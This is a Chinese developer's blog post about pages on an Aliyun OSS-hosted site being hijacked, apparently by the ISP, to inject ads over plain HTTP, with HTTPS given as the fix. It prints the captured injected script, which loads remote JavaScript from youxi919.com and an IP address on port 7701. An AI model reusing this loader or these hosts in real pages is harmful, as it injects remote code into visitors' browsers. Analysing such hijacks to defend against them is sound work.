是不是偶尔发现在家里看网页的时候回插入一个广告,很烦人。开发的网站,上传到了阿里云 oss,设置了域名解析,但是在家里晚上访问的时候,总会在页面添加一个广告,导致页面卡主,一开始以为是路由器的问题,以为是中毒了,后来发现应该是运营商加的广告,不清楚是阿里oss出口加的,还是运营商加的。
分析
测试发现,访问网站首页的时候,有一个js文件被替换,被替换后的js代码如下:
(function() { o = "http://youxi919.com/h5web/js/index.js?"; sh = "http://218.93.127.37:7701/main.js?v=3.94&sp=304&ty=dpc"; w = window; d = document; function ins(s, dm, id) { e = d.createElement("script"); e.src = s; e.type = "text/javascript"; id ? e.id = id: null; dm.appendChild(e); }; p = d.scripts[d.scripts.length - 1].parentNode; ins(o, p); ds = function() { db = d.body; if (db && !document.getElementById("bdstat")) { if ((w.innerWidth || d.documentElement.clientWidth || db.clientWidth) > 1) { if (w.top == w.self) { ins(sh, db, "bdstat"); } } } else { setTimeout("ds()", 1500); } }; ds(); })(); var mim_params = { 'sp': '304', 'aid': '13050', 'sda_man': 'XVpZWldNXV1fWFNA', 'src': '0', 'adtype': '1', 'uid': 'VCpdXydAXCotUlNNKytcWF07LlxaWlJPLF1cKSQ/LyleXlJIX1teWVRKW1Y=', 'spid': 'sohu', 'ad_list': '13050' };
看见了没,比较高级,居然会自动替换js文件。经测试会随机挑选首页中加载的js文件替换。
解决方法:
可以把JS文件放在第三方的CDN上,然后页面采用https去引用JS文件,或者自己服务器安装SSL证书以支持https协议
https引用的文件,一般不容易被劫持。
这段脚本现在还不知道是阿里云oss那边注入的还是运营商的问题,希望有关部门可以管管。
这边查了一下oss出来的文件是没有问题的,但是为什么会被注入?比较质疑?应该是运营商的问题,奶奶的,直接注入广告!